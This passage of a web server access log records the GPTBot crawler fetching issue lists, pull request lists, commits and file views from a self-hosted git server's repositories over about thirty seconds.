GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeSystem.cmake" [Client 74.7.227.38] [Length 25479] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10778] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec?display=rendered" [Client 74.7.227.38] [Length 11117] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:18:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10941] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:18:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11897] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" +[17/Feb/2026:18:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11899] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" +[17/Feb/2026:18:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:19:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:19:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=source" [Client 74.7.227.38] [Length 16909] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:18:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13560] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13560] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13510] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 